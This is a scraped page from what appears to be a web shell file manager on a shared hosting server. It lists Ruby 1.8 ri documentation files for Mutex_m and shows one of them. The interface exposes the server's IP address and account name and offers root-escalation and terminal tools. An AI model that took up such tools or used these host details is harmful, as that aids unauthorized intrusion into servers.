Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.155
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
Mutex_m /
Delete
Unzip
Name
Size
Permission
Date
Action
append_features-c.yaml
187
B
-rw-r--r--
2023-07-26 13:47
cdesc-Mutex_m.yaml
1.24
KB
-rw-r--r--
2023-07-26 13:47
define_aliases-c.yaml
185
B
-rw-r--r--
2023-07-26 13:47
extend_object-c.yaml
184
B
-rw-r--r--
2023-07-26 13:47
mu_extended-i.yaml
177
B
-rw-r--r--
2023-07-26 13:47
mu_initialize-i.yaml
182
B
-rw-r--r--
2023-07-26 13:47
mu_lock-i.yaml
169
B
-rw-r--r--
2023-07-26 13:47
mu_locked%3f-i.yaml
175
B
-rw-r--r--
2023-07-26 13:47
mu_synchronize-i.yaml
238
B
-rw-r--r--
2023-07-26 13:47
mu_try_lock-i.yaml
177
B
-rw-r--r--
2023-07-26 13:47
mu_unlock-i.yaml
173
B
-rw-r--r--
2023-07-26 13:47
new-c.yaml
166
B
-rw-r--r--
2023-07-26 13:47
Save
Rename
--- !ruby/object:RI::ClassDescription attributes: [] class_methods: - !ruby/object:RI::MethodSummary name: append_features - !ruby/object:RI::MethodSummary name: define_aliases - !ruby/object:RI::MethodSummary name: extend_object - !ruby/object:RI::MethodSummary name: new comment: - !ruby/struct:SM::Flow::H level: 2 text: Usage - !ruby/struct:SM::Flow::P body: "Extend an object and use it like a Mutex object:" - !ruby/struct:SM::Flow::VERB body: " require "mutex_m.rb"\n obj = Object.new\n obj.extend Mutex_m\n # ...\n" - !ruby/struct:SM::Flow::P body: "Or, include Mutex_m in a class to have its instances behave like a Mutex object:" - !ruby/struct:SM::Flow::VERB body: " class Foo\n include Mutex_m\n # ...\n end\n\n obj = Foo.new\n" constants: [] full_name: Mutex_m includes: [] instance_methods: - !ruby/object:RI::MethodSummary name: mu_extended - !ruby/object:RI::MethodSummary name: mu_initialize - !ruby/object:RI::MethodSummary name: mu_lock - !ruby/object:RI::MethodSummary name: mu_locked? - !ruby/object:RI::MethodSummary name: mu_synchronize - !ruby/object:RI::MethodSummary name: mu_try_lock - !ruby/object:RI::MethodSummary name: mu_unlock name: Mutex_m superclass: